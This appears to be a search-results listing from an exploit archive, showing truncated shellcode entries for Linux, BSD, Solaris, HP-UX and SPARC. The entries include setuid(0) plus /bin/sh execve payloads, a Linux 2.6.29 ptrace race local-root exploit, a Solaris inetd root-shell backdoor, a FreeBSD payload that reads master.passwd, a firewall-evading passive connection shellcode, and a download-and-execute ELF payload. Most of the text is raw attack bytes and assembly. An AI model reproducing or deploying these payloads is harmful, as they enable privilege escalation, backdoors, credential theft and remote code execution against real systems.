1131 matches found
linux/x86-64 - setuid(0) + execve(/bin/sh) 49 bytes
linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes. Shellcode exploit for lin_x86 platform / setuid(0) + execve(/bin/sh) - just 4 fun. xi4oyu at 80sec.com main asm "xorq %rdi,%rdi\n\t" "mov $0x69,%al\n\t" "syscall \n\t" "xorq %rdx, %rdx \n\t" "movq $0x68732f6e69622fff,%rbx; \n\t" "shr $0x8, %rbx; \n\t" "pu...
Linux Kernel 2.6.29 - ptrace_attach() Race Condition Privilege Escalation
Linux Kernel 2.6.29 - ptrace_attach() Race Condition Privilege Escalation / GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit. This is a local root exploit for the 2.6.29 ptrace_attach() race condition that...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
No description provided by source. / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 [email protected] ; [email protected] http://anderson.hacknroll.com http://blog.hacknroll.com \x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging. Shellcode exploit for freebsd_x86 platform / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 http://anderson.hacknroll.com http://blog.hacknroll.com \x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
Exploit for freebsd/x86 platform in category shellcode. FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 andersonunderground...
CSO/x86 - execve("/bin/sh", ..., NULL) - 43 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve"/bin/sh", ..., NULL; / include "sys/types.h" include "stdio.h" char scode = "\x31\xc9" // xor %ecx,%ecx "\x89\xe3" // mov %esp,%ebx "\x68\xd0\x8c\x97\xff" // push $0xff978cd0...
Hp-ux - execve(/bin/sh) - 58 bytes
No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...
NetBSD/x86 - execve(/bin/sh) - 68 bytes
No description provided by source. / NetBSD execve of /bin/sh by humble of Rhino9 / char shellcode = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"...
Solaris/x86 - add services and execve inetd - 201 bytes
No description provided by source. / Solaris/x86 Just execve's the following: "echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;" "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x"; for a trivial remote bd. Used in a few old Solaris/x86 remote exploits. / char c0de =...
FreeBSD/x86 - setuid(0)&execve({"//sbin/ipf","-Faa",0},0); - 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...
BSD/ppc - execve(/bin/sh) - 128 bytes
No description provided by source. / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's BSD PPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14, 0x7CC419A...
NetBSD/x86 - setreuid(0, 0); execve("/bin//sh", ..., NULL); - 29 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / include "sys/types.h" include "stdio.h" include "string.h" char scode = "\x9...
FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
BSD/32bits - Passive Connection - 126 bytes
No description provided by source. ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntax - it's gross and unreadable ; ; This is the FreeBSD...
BSD/x86 - setuid/execve - 30 bytes
No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...
BSD/x86 - execve(/bin/sh) - 27 bytes
No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...
BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...
Linux/x86 - HTTP/1.x GET, Downloads & execve()
No description provided by source. / linux/x86 - HTTP/1.x GET, Downloads and execve - 111 bytes+ This shellcode allows you to download an ELF executable straight off a standard HTTP server and launch it. It will save it locally into a filename called 'A' in the current directory. CONFIGURATION Th...
Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes
No description provided by source. / Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema [email protected] / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta...
Linux/x86 - execve(/bin/sh) - 24 bytes
No description provided by source. / [email protected] execve/bin/sh. 24 bytes. It's the smallest that can be made. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...